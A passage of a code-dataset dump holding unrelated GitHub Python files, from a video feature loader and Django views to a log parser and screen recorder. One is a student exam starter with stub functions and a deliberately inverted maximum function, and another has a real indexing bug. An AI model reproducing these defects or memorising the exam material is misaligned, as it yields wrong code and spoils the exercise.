osp.normpath(\n osp.join(self.lfb_prefix_path, f'lfb_{dataset_mode}.pkl'))\n print(f'Loading LFB from {lfb_path}...')\n self.lfb.update(torch.load(lfb_path, map_location=map_location))\n\n for video_id in self.lfb:\n video_features = self.lfb[video_id]\n for sec in video_features:\n if isinstance(video_features[sec], (list, tuple)):\n video_features[sec] = torch.stack(video_features[sec])\n self.lfb[video_id] = video_features\n print(f'LFB has been loaded on {map_location}.')\n\n def load_lfb_on_lmdb(self):\n lfb = {}\n for dataset_mode in self.dataset_modes:\n lfb_path = osp.normpath(\n osp.join(self.lfb_prefix_path, f'lfb_{dataset_mode}.pkl'))\n lfb.update(torch.load(lfb_path, map_location='cpu'))\n\n lmdb_env = lmdb.open(self.lfb_lmdb_path, map_size=self.lmdb_map_size)\n for key, value in lfb.items():\n txn = lmdb_env.begin(write=True)\n buff = io.BytesIO()\n torch.save(value, buff)\n buff.seek(0)\n txn.put(key.encode(), buff.read())\n txn.commit()\n buff.close()\n\n print(f'LFB lmdb has been constructed on {self.lfb_lmdb_path}!')\n\n def sample_long_term_features(self, video_id, timestamp):\n if self.device == 'lmdb':\n with self.lmdb_env.begin(write=False) as txn:\n buf = txn.get(video_id.encode())\n video_features = torch.load(io.BytesIO(buf))\n else:\n video_features = self.lfb[video_id]\n\n # Sample long term features.\n window_size, K = self.window_size, self.max_num_sampled_feat\n start = timestamp - (window_size // 2)\n lt_feats = torch.zeros(window_size, K, self.lfb_channels)\n\n for idx, sec in enumerate(range(start, start + window_size)):\n if sec in video_features:\n # `num_feat` is the number of roi features in this second.\n feat = video_features[sec]\n num_feat = feat.shape[0]\n\n # Sample some roi features randomly.\n random_lfb_indices = torch.randperm(num_feat)[:K]\n lt_feats[idx, :num_feat] = feat[random_lfb_indices]\n\n # [window_size * max_num_sampled_feat, lfb_channels]\n return lt_feats.reshape(-1, self.lfb_channels)\n\n def __getitem__(self, img_key):\n \"\"\"Sample long term features like `lfb['0f39OWEqJ24,0902']` where `lfb`\n is a instance of class LFB.\"\"\"\n video_id, timestamp = img_key.split(',')\n return self.sample_long_term_features(video_id, int(timestamp))\n\n def __len__(self):\n \"\"\"The number of videos whose ROI features are stored in LFB.\"\"\"\n return len(self.lfb)\n","repo_name":"open-mmlab/mmaction2","sub_path":"mmaction/models/roi_heads/shared_heads/lfb.py","file_name":"lfb.py","file_ext":"py","file_size_in_byte":7904,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"39509362194","text":"from abc import ABC, abstractmethod\nfrom usuarios.repositorio.abstract_factory import AbstractFactory\nfrom .models import Usuario\nfrom peewee import IntegrityError, DoesNotExist\n\nclass UsuarioFactory(ABC):\n database = AbstractFactory.get_database()\n database.connect()\n\n @staticmethod\n def insert_usuario(usuario):\n try:\n new_usuario = Usuario(**usuario)\n new_usuario.save()\n return True\n except IntegrityError:\n return False\n\n @staticmethod\n def select_usuario(id_usuario):\n user = None\n try:\n user = Usuario.get(id_usuario=id_usuario).to_dict()\n except IndexError:\n print(IndexError)\n except DoesNotExist:\n print(DoesNotExist)\n\n print(user)\n return user\n\n @staticmethod\n def select_all_usuarios():\n usuarios = None\n try:\n usuarios = [u.to_dict() for u in Usuario.select()]\n except DoesNotExist:\n print(DoesNotExist)\n except IndexError:\n print(IndexError)\n except Exception:\n print(Exception)\n return usuarios\n\n @staticmethod\n def update_usuario(usuario):\n return None\n\n @staticmethod\n def delete_usuario(id_usuario):\n eliminated = False\n try:\n Usuario.delete_by_id(id_usuario)\n eliminated = True\n except:\n pass\n return eliminated\n\n\n","repo_name":"josemhenao/pilae_usuarios","sub_path":"usuarios/repositorio/usuario_factory.py","file_name":"usuario_factory.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7228011905","text":"import pandas as pd \nimport pickle\nimport pubmed_parser as pp\nimport os\nimport json\nimport numpy as np\nimport random \n\n\ndef get_data_pmid(pmid):\n \"\"\"\n \"\"\"\n global pubmed_file\n global dicts_articles\n #get file xml file that contains the pmid \n try:\n pubmed_file_new = str(pmid2file[str(pmid)])\n except:\n return None\n \n # print('Found pmid in file:', pubmed_file_new)\n #If the pmid is in other file open it\n if pubmed_file_new != pubmed_file:\n pubmed_file = pubmed_file_new\n print('Opening:', pubmed_file)\n dicts_articles = pp.parse_medline_xml(os.path.sep.join([DATA_DIR,pubmed_file]))\n \n article_dict = find_article(dicts_articles,pmid)\n\n return article_dict if not None else None\n\ndef find_article(dicts_articles, pmid):\n \"\"\"\n find the article with pmid in the list of articles\n \"\"\"\n\n for article in dicts_articles:\n if article['pmid'] == str(pmid): \n return article\n\n return None\n# with open('data/pmid2file.pickle', 'rb') as handle:\n# = pickle.load(handle)\n\ndef process_context(text,start,end,num_words=16):\n\n #The start and end are not quite exact, we try to match the word\n #around start and end\n #hloride binding and theBohr effect of human fetal erythrocytes and HbFII solutions.\n #Heruistic finding the correct start and end\n while start > 0:\n if text[start] in \" ,.;())[]-\":\n break\n start -= 1\n\n while end < len(text) :\n if text[end] in \" ,.;()[]-\":\n break\n end += 1\n\n left_words = text[0:start].split()#['the','C02',..]\n num_left_words = int(num_words/2 ) \n if len(left_words) < num_left_words:\n num_left_words = len(left_words)\n\n left_words = ' '.join(left_words[-num_left_words:])\n\n right_words = text[end:-1].split() # ['the','C02',..]\n num_right_words = int(num_words/2)\n if len(right_words) < num_right_words:\n num_right_words = len(right_words)\n\n right_words = ' '.join(right_words[:num_right_words])\n left_words = left_words.replace('\"', '')\n right_words = right_words.replace('\"', '')\n\n # return left_words + ' ' + str(mention) + ' ' + right_words\n return left_words , right_words\n # return '' + text[start:end+1] + ''\n\ndef create_dataset():\n global cui2thing\n n = 0\n idx = 0 \n ide2line = open(os.path.sep.join([DATASET_DIR,\"id2line.json\"]), \"w\", encoding='utf8') # append mode\n ide2line.write(\"{\\n\")\n #File is huge work on chunkers \n for df in pd.read_csv('data/Bio_entities_Main.csv', iterator=True, chunksize=1000): \n # print(pd.DataFrame(df.groupby([\"PMID\"]).size().reset_index(name=\"Count\")))\n #Group list of pmids in the chunk\n list_pmids_chuck = df.PMID.unique()\n for pmid in list_pmids_chuck:\n # print(\"Processing PMID:\",pmid)\n #get abstract and title of the pmid\n article_dict = get_data_pmid(pmid)\n if article_dict == None:\n print(\"Pmid not found in files\")\n continue\n\n # print('title:', article_dict['title'])\n # print('abstract:', article_dict['abstract'])\n article_text = article_dict['title'] + article_dict['abstract']\n #Process rows\n rows = df[df.PMID == pmid]\n for index,row in rows.iterrows(): \n # print(row)\n Mention = row.Mention\n EntityID = row.EntityID \n Type = row.Type\n left_words = ''\n right_words = '' \n try:\n left_words,right_words = process_context(article_text, int(row.Start),int(row.End))\n context = left_words + ' ' + \\\n str(Mention) + ' ' + right_words\n except:\n continue\n\n if EntityID not in cui2thing:\n # index,mention(cano),definition\n defin = left_words + \" \" + str(Mention) + \" \" + right_words\n cui2thing[EntityID] = [str(idx), str(Mention), str(defin)]\n idx += 1\n\n line = str(EntityID) + '\\\\t' + str(Type) + '\\\\t' + str(Mention) + '\\\\t' + str(context)\n n += 1 \n # ###DEBUG\n # if n == 100:\n # ###DEBUG\n ide2line.write('\"{0}\": \"{1}\",\\n'.format(n,line))\n ide2line.flush()\n ###\n cui2emb = np.zeros((idx, 100))\n with open(os.path.sep.join([DATASET_DIR, 'cui2emb.pkl']), 'wb') as handle:\n pickle.dump(cui2emb, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n ide2line.seek(ide2line.tell() - 2, os.SEEK_SET)\n ide2line.write('')\n ide2line.write(\"}\\n\")\n ide2line.close()\n\n #Creating the test train dev partitions of the dataset\n indexs = [i for i in range(n)]\n random.shuffle(indexs)\n lim_train = int(n * 0.70)\n lim_dev = lim_train + int(n*0.20)\n\n with open(os.path.sep.join([DATASET_DIR, 'train_mentionid.pkl']), 'wb') as handle:\n train_idx = indexs[:lim_train]\n pickle.dump(train_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n with open(os.path.sep.join([DATASET_DIR, 'dev_mentionid.pkl']), 'wb') as handle:\n dev_idx = indexs[lim_train:lim_dev]\n pickle.dump(dev_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n with open(os.path.sep.join([DATASET_DIR, 'test_mentionid.pkl']), 'wb') as handle:\n test_idx = indexs[lim_dev:-1]\n pickle.dump(test_idx, handle,\n protocol=pickle.HIGHEST_PROTOCOL)\n\n return\n\n## \n# \n#\n\nDATA_DIR = 'data'\nDATASET_DIR = 'dataset'\nif not os.path.exists(DATASET_DIR):\n os.mkdir(DATASET_DIR)\nprint(\"Loading pmid to pubmed dict:\")\nhandle = open('data/pmid2file.pickle', 'rb')\npmid2file = pickle.load(handle)\n#we start with the\npubmed_file = 'pubmed21n0001.xml.gz'\nprint('Opening:', pubmed_file)\ndicts_articles = pp.parse_medline_xml(\n os.path.sep.join([DATA_DIR, pubmed_file]))\n#\ncui2thing = {}\n\ncreate_dataset()\n\nprint(\"Creating cui2cano cui2def cui2idx idx2cui...\")\ncui2cano_file = open(os.path.sep.join([DATASET_DIR, \"cui2cano.json\"]), \"w\", encoding='utf8') # append mode\ncui2def_file = open(os.path.sep.join([DATASET_DIR, \"cui2def.json\"]), \"w\", encoding='utf8') # append mode\ncui2idx_file = open(os.path.sep.join([DATASET_DIR, \"cui2idx.json\"]), \"w\", encoding='utf8') # append mode\nidx2cui_file = open(os.path.sep.join([DATASET_DIR, \"idx2cui.json\"]), \"w\", encoding='utf8') # append mode\n\ncui2idx_file.write(\"{\\n\")\nidx2cui_file.write(\"{\\n\")\ncui2cano_file.write(\"{\\n\")\ncui2def_file.write(\"{\\n\")\n# pprint.pprint(cui2thing)\nfor cui, value in cui2thing.items():\n cui2idx_file.write('\"{0}\": {1},\\n'.format(cui, value[0]))\n idx2cui_file.write('\"{0}\": \"{1}\",\\n'.format(value[0],cui))\n cui2cano_file.write('\"{0}\": \"{1}\",\\n'.format(cui, value[1]))\n cui2def_file.write('\"{0}\": \"{1}\",\\n'.format(cui, value[2]))\nprint(\"Finished sucessfully\")\n\n#Delet last comman an add the final } , -2 because the \\n\ncui2idx_file.seek(cui2idx_file.tell() - 2, os.SEEK_SET)\ncui2idx_file.write('')\nidx2cui_file.seek(idx2cui_file.tell() - 2, os.SEEK_SET)\nidx2cui_file.write('')\n\ncui2cano_file.seek(cui2cano_file.tell() - 2, os.SEEK_SET)\ncui2cano_file.write('')\n\ncui2def_file.seek(cui2def_file.tell() - 2, os.SEEK_SET)\ncui2def_file.write('')\n\ncui2idx_file.write(\"\\n}\")\nidx2cui_file.write(\"\\n}\")\ncui2cano_file.write(\"\\n}\")\ncui2def_file.write(\"\\n}\")\n\n# print(cui2thing)\n\n\n","repo_name":"jcrangel/pubmed_data_task","sub_path":"pubmed_data_task/create_dataset.py","file_name":"create_dataset.py","file_ext":"py","file_size_in_byte":7604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26685830915","text":"#!/usr/bin/python\n\nimport sys\nimport os\nimport ConfigParser\nfrom movie import Movie\n\nverbose = False\nconfigfile = '~/.imdbtagrc'\n\ntry:\n import tmdb.tmdb as tmdb\nexcept ImportError:\n sys.stderr.write(\"You bad boy! You need to install the tmdb package!\\n\")\n sys.stderr.write(\"See github.com/doganaydin/themoviedb\\n\")\n sys.exit(1)\n\ntry:\n config = ConfigParser.ConfigParser()\n config.read(os.path.expanduser(configfile))\n api_key = config.get('general', 'api_key')\n tmdb.configure(api_key)\nexcept ConfigParser.NoSectionError:\n sys.stderr.write(\"No section [general] found in config file \" + configfile +\n \"\\n\")\n sys.exit(1)\nexcept ConfigParser.NoOptionError:\n sys.stderr.write(\"No api_key property found in config file %s\\n\" % configfile)\n sys.exit(1)\n\ndef _selftest():\n global verbose\n verbose = True\n print(\"Running some tests\")\n print(\"Getting movie \\\"Fight Club\\\" by ID\")\n movie = api_get_movie(550)\n print(\"Movie info from tmdb: '\" + movie.nice_title() + \"'\")\n \n print(\"Querying by string\")\n results = api_search_movie(\"fight club\")\n if len(results) == 0:\n print(\"No results found\")\n else:\n print(\"Results found:\")\n i = 0\n for m in results:\n print(\"Result %d: %s\" % (i, m.nice_title()))\n i = i + 1\n\ndef api_get_movie(id):\n tmdb_m = tmdb.Movie(id)\n return _tmdb2movie(tmdb_m)\n\ndef api_search_movie(querystr_enc):\n # Convert to ascii, because of a bug in urlllib (can't search for unicode)\n querystr = querystr_enc.encode('ascii', 'ignore')\n\n r = []\n movies = tmdb.Movies(querystr, True) # True means only get first page results\n for m in movies.iter_results():\n r.append(_tmdbhash2movie(m))\n return r\n\n# TODO marius/2012-12-29: Refactor the two 2movie functions\n\ndef _tmdb2movie(tmdb_m):\n \"\"\"Converts a movie object of the tmdb package into our own movie class.\"\"\"\n out_encoding = sys.stdout.encoding or \"UTF-8\"\n \n # TMDb has no \"index\" field\n idx = \"\"\n\n return Movie(\n tmdb_m.get_original_title().encode(out_encoding, 'replace'),\n tmdb_m.get_release_date() and tmdb_m.get_release_date()[0:4] or '',\n idx,\n str(tmdb_m.get_id()),\n '', # no \"kind\" field in tmdb\n tmdb_m.get_vote_average() and str(tmdb_m.get_vote_average()) or ''\n )\n\ndef _tmdbhash2movie(m):\n \"\"\"Converts a movie hash object of the tmdb package into our own movie class.\"\"\"\n out_encoding = sys.stdout.encoding or \"UTF-8\"\n \n # TMDb has no \"index\" field\n idx = \"\"\n\n return Movie(\n m['original_title'].encode(out_encoding, 'replace'),\n # Only keep first 4 digits of release date\n m['release_date'] and m['release_date'][0:4] or '',\n idx,\n str(m['id']),\n '', # no \"kind\" field in tmdb\n m['vote_average'] and str(m['vote_average']) or ''\n )\n\ndef _debug(s):\n if verbose:\n sys.stderr.write(\"DEBUG: \" + s + \"\\n\")\n\n\nif __name__ == \"__main__\":\n print(\"Import this module from your script.\")\n _selftest()\n","repo_name":"infogrind/imdbtag","sub_path":"imdbtag/apis/tmdbapi.py","file_name":"tmdbapi.py","file_ext":"py","file_size_in_byte":3018,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36377193368","text":"n, m = map(int,input().split())\nx, y, direction = map(int,input().split())\narray = []\nfor i in range (n):\n array.append(list(map(int, input().split())))\n# 방문한 위치를 저장하기 위한 맵을 생성하여 0으로 초기화\nd = [[0] * m for _ in range(n)]\n# 현재 좌표 방문처리하기\nd[x][y] = 1\n# 북, 동, 남, 서 방향 정의\ndx = [-1,0,1,0]\ndy = [0,1,0,-1]\n\n# 왼쪽으로 회전\ndef turn_left():\n global direction\n direction -= 1\n if direction == -1:\n direction = 3\n# 시뮬레이션 시작\ncount = 1\nturn_time = 0\nwhile True:\n turn_left()\n nx = x + dx[direction]\n ny = y + dx[direction]\n # 회전한 이후 정면에 가보지 않은 육지가 존재하는 경우 이동\n if d[nx][ny] == 0 and array[nx][ny] == 0:\n d[nx][ny] = 1\n x = nx\n y = ny\n count += 1\n turn_time = 0\n continue\n # 회전한 이후 정면에 가본 곳이거나 바다가 존재하는 경우 이동\n else:\n turn_time += 1\n # 네 방향 모두 못 가는 경우\n if turn_time == 4:\n nx = x - dx[direction]\n ny = y - dy[direction]\n # 뒤로 갈 수 있으면 이동\n if array[nx][ny] == 0:\n x = nx\n y = ny\n # 뒤가 바다로 막힌 경우\n else:\n break # 움직임 멈춤\n turn_time = 0\n# 정답 출력\nprint(count)","repo_name":"LeeYongIn0517/CodingTest","sub_path":"implementation/게임개발.py","file_name":"게임개발.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10941763868","text":"import bleach\nfrom flask_mail import Message\nfrom flask import current_app\n\nfrom api import mail\n\n\ndef send_to_default(data):\n\tsubject = '[Prescrisur] ' + bleach.clean(data['subject'])\n\tbody = bleach.clean(data['body'])\n\tsender = (data['sender']['name'], data['sender']['email'])\n\tmsg = Message(subject=subject, html=body, sender=sender, reply_to=data['sender']['email'], recipients=[current_app.config['DEFAULT_RECIPIENT']])\n\tmail.send(msg)\n\n\ndef send_from_default(recipient, subject, body):\n\tsender = current_app.config['MAIL_DEFAULT_SENDER']\n\tmsg = Message(subject=subject, html=body, sender=sender, recipients=[recipient])\n\tmail.send(msg)\n","repo_name":"pybuche/prescrisur","sub_path":"api/services/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"28107719183","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.cache import cache_page\nfrom django.core.urlresolvers import reverse\nfrom django.core import serializers\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\nfrom .models import Connexion, Membre, Categorie, Langage\nfrom .forms import ConnexionForm, MembreForm, CategorieForm, LangageForm\n\ndef connexion(request):\n error = False\n \n if request.method == \"POST\":\n form = ConnexionForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n password = form.cleaned_data['password']\n user = authenticate(username=username, password=password)\n \n if user :\n login(request, user)\n else :\n error = True\n else :\n form = ConnexionForm()\n \n return render(request, 'osradmin/login.html', locals())\n\ndef deconnexion(request):\n logout(request)\n return redirect(reverse(connexion))\n\nclass NotificationView(TemplateView):\n def get(self, request, *args, **kwargs):\n id_user = request.GET['id']\n user = Membre.objects.filter(id=id_user)\n data = serializers.serialize('json', user, fields=('site_web'))\n return HttpResponse(data, content_type='application/json')\n\n#@cache_page(60 * 15)\n@login_required\ndef userAdd(request):\n error = False\n \n if request.method == \"POST\":\n form = MembreForm(request.POST)\n if form.is_valid():\n username = form.cleaned_data['username']\n first_name = form.cleaned_data['first_name']\n last_name = form.cleaned_data['last_name']\n email = form.cleaned_data['email']\n site_web = form.cleaned_data['site_web']\n facebook = form.cleaned_data['facebook']\n twitter = form.cleaned_data['twitter']\n instagram = form.cleaned_data['instagram']\n linkedin = form.cleaned_data['linkedin']\n googleplus = form.cleaned_data['google_plus']\n signature = form.cleaned_data['signature']\n biographie = form.cleaned_data['biographie']\n password = User.objects.make_random_password() #Nous generons automatiquement le mot de passe du membre (système offert par django)\n user = User.objects.create_user(username, email, password) # Nous créons le membre avec les trois premièrs paramètres\n user.first_name, user.last_name = first_name, last_name # Et là nous ajoutons les autres paramètres\n membre = Membre(user=user, site_web=site_web, facebook=facebook, twitter=twitter, instagram=instagram, linkedin=linkedin, googleplus=googleplus, signature=signature, biographie=biographie) # Et là enregistrement de tous les informations du membre dans la base de données dans la table 'Membre' c'est-à-dire le model 'Membre'(chaque model represente une table dans la base de donnée)\n membre.save()\n \n error = True\n else:\n form = MembreForm()\n \n return render(request, 'osradmin/user_add.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef userlist(request):\n membre = Membre.objects.order_by(\"-user_id\")\n return render(request, 'osradmin/user_list.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef addCategorie(request):\n right = False\n if request.method == \"POST\":\n form = CategorieForm(request.POST)\n if form.is_valid():\n categorie_name = form.cleaned_data['categorie']\n categorie = Categorie(categorie=categorie_name)\n categorie.save()\n \n right = True\n else:\n form = CategorieForm()\n \n return render(request, 'osradmin/categorie_add.html', locals())\n\n#@cache_page(60 * 15)\n@login_required\ndef addLangage(request):\n right = False\n if request.method == \"POST\":\n form = LangageForm(request.POST)\n if form.is_valid():\n langage_name = form.cleaned_data['langage']\n categorie = form.cleaned_data['categorie']\n langage = Langage(langage=langage_name, categorie=categorie)\n langage.save()\n \n right = True\n else:\n form = LangageForm()\n \n return render(request, 'osradmin/add_langage.html', locals())","repo_name":"Malal91/Osradmin","sub_path":"osradmin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"8600549266","text":"\"\"\"Question five for an executable examination.\"\"\"\n\nfrom typing import List\n\n# TODO: Answer all of the sub-questions inside of this file\n\n# TOOD: Answer each sub-question and then save and commit and push your work\n# so that you can confirm through GitHub Actions whether your answer is correct or not\n\n# TODO: Please bear in mind that you are responsible for fixing any\n# defects that you introduce into these functions that cause\n# the overall program to crash and/or produce unexpected output\n\n# Question 5a. {{{\n\n# Instructions:\n# Implement the requested function so that it operates in the specified fashion\n\n# Function description:\n# The function compute_cube should:\n# --> Accept as input one int value called input_one\n# --> Using any appropriate approach compute and return the cube of that number\n# --> For instance, if input_one is equal to 1 then this function would return 1\n# --> For instance, if input_one is equal to 2 then this function would return 8\n\n\ndef compute_cube(input_one: int) -> int:\n \"\"\"Use any approach that can cube an input number.\"\"\"\n cube_output = 0\n return cube_output\n\n\ndef question_five_a():\n \"\"\"Run question five-a.\"\"\"\n # Do not edit this function\n space = \" \"\n question_five_output_a = str(compute_cube(1))\n question_five_output_a = question_five_output_a + space + str(compute_cube(2))\n question_five_output_a = question_five_output_a + space + str(compute_cube(3))\n return question_five_output_a\n\n\n# }}}\n\n# Question 5b. {{{\n\n# Instructions:\n# Fix the defect(s) in the following function\n\n# Function description:\n# The function get_maximum should:\n# --> Accept as input two int values called input_one and input_two\n# --> If the value in input_one is greater than or equal to input_two\n# then the function should return the value of input_one\n# --> Otherwise, it should return the value of input_two\n\n\ndef get_maximum(input_one: int, input_two: int) -> int:\n \"\"\"Return the maximum value of two input values.\"\"\"\n if input_one <= input_two:\n return input_one\n return input_two\n\n\ndef question_five_b():\n \"\"\"Run question five-b.\"\"\"\n # Do not edit this function\n space = \" \"\n question_five_output_b = str(get_maximum(12, 10))\n question_five_output_b = question_five_output_b + space + str(get_maximum(3, 9))\n question_five_output_b = question_five_output_b + space + str(get_maximum(3, 3))\n return question_five_output_b\n\n# }}}\n\n# Question 5c. {{{\n\n# Instructions:\n# Implement the following function so that it meets the following description\n\n# Function description:\n# The function compute_intersection should:\n# --> Accept as input two lists of integer values, that may potentially contain duplicate values\n# --> Compute the intersection of the two lists and return it as a list of integer values,\n# ensuring that the output list does not contain any duplicate values\n\n# For instance, if the function receives the inputs:\n# [12, 10] and [9, 10, 11]\n# then it would produce as output:\n# [10]\n\n# Note that in this example the use of the starting and ending brackets (i.e., [ and ])\n# designates that the integer values are contained inside of a list\n\n# Additionally, if the two input lists do not have any values in common\n# then the function should return the output value of [], to designate an empty list\n\n\ndef compute_intersection(input_one: List[int], input_two: List[int]) -> List[int]:\n \"\"\"Compute the intersection of two lists of integers, returning a resulting list without duplicates.\"\"\"\n intersection_list = []\n return intersection_list\n\n\ndef question_five_c():\n \"\"\"Run question five-c.\"\"\"\n # Do not edit this function\n separator = \" / \"\n question_five_output_c = str(compute_intersection([12, 10], [9, 10, 11]))\n question_five_output_c = question_five_output_c + separator + str(compute_intersection([1, 2, 3], [9, 10, 11]))\n question_five_output_c = question_five_output_c + separator + str(compute_intersection([2, 2, 3], [1, 2, 3]))\n return question_five_output_c\n\n# }}}\n\n# Do not edit any of the source code below this line\n\n\ndef run_question_five():\n \"\"\"Run all of the subquestions in question five.\"\"\"\n # call the function for question five-a\n output = question_five_a()\n print(output)\n # call the function for question five-b\n output = question_five_b()\n print(output)\n # call the function for question five-c\n output = question_five_c()\n print(output)\n\n\nif __name__ == \"__main__\":\n run_question_five()\n","repo_name":"Allegheny-Computer-Science-102-S2023/discrete-structures-executable-examination-three-starter","sub_path":"source/question_five.py","file_name":"question_five.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5576120472","text":"from django.conf.urls import url\r\nfrom certificate import views\r\n\r\nurlpatterns=[\r\n url('add/',views.cer),\r\n url('view/',views.view),\r\n url('del/',views.delcert),\r\n url('d/(?P\\w+)', views.dele),\r\n]\r\n\r\n\r\n","repo_name":"Devadk13/Cert-Ease-A-digital-Certficate-request-and-approval-system","sub_path":"certificate/url.py","file_name":"url.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30119026807","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING, Optional\n\nfrom dm.core.objects.status import DMStatus\nfrom utilities import *\n\nif TYPE_CHECKING:\n from dm.core.contexts import AttackContext\n from dm.core.objects.unit import DMUnit\n from dm.core.game.game import DMGame\n################################################################################\n\n__all__ = (\"Frostbite\",)\n\n################################################################################\nclass Frostbite(DMStatus):\n\n def __init__(\n self,\n game: DMGame,\n parent: Optional[DMUnit] = None,\n stacks: Optional[int] = 1\n ):\n\n super().__init__(\n game,\n parent,\n _id=\"DBF-114\",\n name=\"Frostbite\",\n description=(\n \"Damage received increases 5% per Slow possessed, and effect \"\n \"increases depending on Dull possessed. Stat is halved when \"\n \"receiving damage.\"\n ),\n stacks=stacks,\n status_type=StatusType.Debuff,\n base_effect=0.05\n )\n\n################################################################################\n def handle(self, ctx: AttackContext) -> None:\n \"\"\"Called in every battle loop iteration.\"\"\"\n\n # If we're defending\n if self.owner == ctx.target:\n # Increase damage:\n ctx.amplify_pct(self.effect_value())\n # Reduce stacks\n self.reduce_stacks_by_half()\n\n################################################################################\n @property\n def base_effect(self) -> float:\n\n dull = self.owner.get_status(\"Dull\")\n if dull is None:\n return 0\n\n return (self._base_effect * self._base_scalar) + (0.001 * dull.stacks)\n\n################################################################################\n def effect_value(self) -> float:\n \"\"\"The value of this status's effect.\n\n Breakdown:\n ----------\n **effect = b * s**\n\n In this function:\n\n - b is the base adjustment.\n - s is the number of Slow stacks.\n \"\"\"\n\n slow = self.owner.get_status(\"Slow\")\n if slow is None:\n return 0\n\n return self.base_effect * slow.stacks\n\n################################################################################\n","repo_name":"AllegroVivo/DungeonDefense","sub_path":"dm/statuses/debuffs/Frostbite.py","file_name":"Frostbite.py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26202292584","text":"\"\"\"\nGiven a web server log file, return the 10 most frequently requested files and\ntheir cumulative bytes transferred. Only include GET requests with HTTP 2xx\nresponses. Resolve ties by file name.\n\nLog format:\n- request timestamp\n- request line from client\n- HTTP status code\n- size of the returned object\n\nGiven this input data:\n\n [29/Jan/1776:00:54:59 -0400] \"GET /img/filename1.gif HTTP/1.0\" 200 32511\n [29/Jan/1776:00:55:04 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n [29/Jan/1776:00:55:06 -0400] \"GET /img/filename2.gif HTTP/1.0\" 403 298\n [29/Jan/1776:00:55:09 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n [29/Jan/1776:00:55:18 -0400] \"GET /img/filename1.gif HTTP/1.0\" 200 32511\n [29/Jan/1776:00:56:52 -0400] \"GET /img/filename2.gif HTTP/1.0\" 200 3635\n\nThe result should be:\n\n /img/filename2.gif 10905\n /img/filename1.gif 65022\n\n\"\"\"\n\ndef get_most_requested(log_file):\n \"\"\" Prints the file path and cumulative bytes transferred in descending\n order of request quantity.\n\n \"\"\"\n\n if not log_file:\n return None\n\n with open(log_file) as log:\n requests = [line.strip() for line in log.readlines()]\n\n files = {}\n\n for request in requests:\n _, _, r_type, r_file, _, r_status, t_bytes = request.split()\n # Ignore non-GET and unsuccessful requests\n if r_type != '\"GET' or r_status[0] != '2':\n continue\n # Log each unique file; increment request count and add bytes\n files[r_file] = files.get(r_file, [0, 0])\n files[r_file][0] += 1 # Increment request count\n files[r_file][1] += int(t_bytes) # Increase total t_bytes\n\n # Print first 10 files' name and total t_bytes desc-sorted by request count\n for item in sorted(files.items(), key=lambda f: f[1][0], reverse=True)[:10]:\n print(item[0], item[1][1])\n","repo_name":"meggangreen/code-challenges","sub_path":"parse_http_request_log.py","file_name":"parse_http_request_log.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29438123241","text":"\nimport pyautogui\nimport cv2\nimport numpy as np\n \n# Specify resolution\nresolution = (1920, 1080)\n \n# Specify video codec\ncodec = cv2.VideoWriter_fourcc(*\"XVID\")\n \n# Specify name of Output file\nfilename = \"Recording.avi\"\n \n# Specify frames rate.\nfps = 60.0\n \n \nout = cv2.VideoWriter(filename, codec, fps, resolution)\n\ncv2.namedWindow(\"Live\", cv2.WINDOW_NORMAL)\n \n# Resize this window\ncv2.resizeWindow(\"Live\", 480, 270)\n \nwhile True:\n \n img = pyautogui.screenshot()\n\n frame = np.array(img)\n \n\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n \n\n out.write(frame)\n \n\n cv2.imshow('Live', frame)\n \n # Stop recording when we press 'q'\n if cv2.waitKey(1) == ord('q'):\n break\n \n# Release the Video writer\nout.release()\n \n# Destroy all windows\ncv2.destroyAllWindows()\n","repo_name":"qwel-exe/Python-Screen-recorder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21275060005","text":"import turtle\n\n# fruit = \"apple\"\n# for idex in range(5):\n# currentChar = fruit[idex]\n# print(currentChar)\n\n# fruit = \"apple\"\n# for idx in range(len(fruit) - 1, 1, -1):\n# print(fruit[idx])\n\n\n\n# fruit = \"dragons\"\n#\n# position = 0\n# while position < len(fruit):\n# print(fruit[position])\n# position = position + 1\n#\n#\n# s = \"python rocks\"\n# idx = 1\n# while idx < 